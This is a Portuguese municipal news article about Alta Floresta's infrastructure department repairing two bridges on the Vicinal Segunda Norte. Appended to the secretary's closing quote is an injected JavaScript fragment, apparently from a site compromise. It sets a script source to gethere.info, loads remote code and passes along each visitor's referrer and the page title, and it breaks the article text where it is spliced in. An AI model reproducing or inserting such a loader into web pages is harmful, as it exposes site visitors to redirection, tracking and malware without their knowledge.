Capa / Cidades / Secretaria de Infraestrutura recupera pontes na Vicinal Segunda Norte

Secretaria de Infraestrutura recupera pontes na Vicinal Segunda Norte

DSCN5190Lindomar Leal
Assessoria da PMAF

A Prefeitura de Alta Floresta, por meio da Secretaria Municipal de Infraestrutura, concluiu na última quarta-feira, 16, a construção de uma ponte de 7 metros de comprimento na Vicinal Segunda Norte, localizada na Comunidade Santo Antônio no Setor Norte, com acesso para a Comunidade 12 Apóstolos.
Esta foi a segunda ponte recuperada pela Secretaria de Infraestrutura em menos de quinze dias. No começo desse mês foi trocado todo o madeiramento de uma ponte de aproximadamente 15 metros, localizada na mesma vicinal. Para consertar esta ponte a Prefeitura de Alta Floresta contou com o apoio do Deputado Estadual Ondanir Bortolini – Nininho, que cedeu a madeira.
O secretário de Infraestrutura, Eloi Luiz de Almeida, percorreu as vicinais do setor verificando as condições de trafegabilidade e também vistoriou o serviço de construção e recuperação das pontes. “O importante é darmos condições de trafegabilidade para a população, principalmente para os moradores daquelas vicinais que precisam transportar as produções”, ressaltou.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top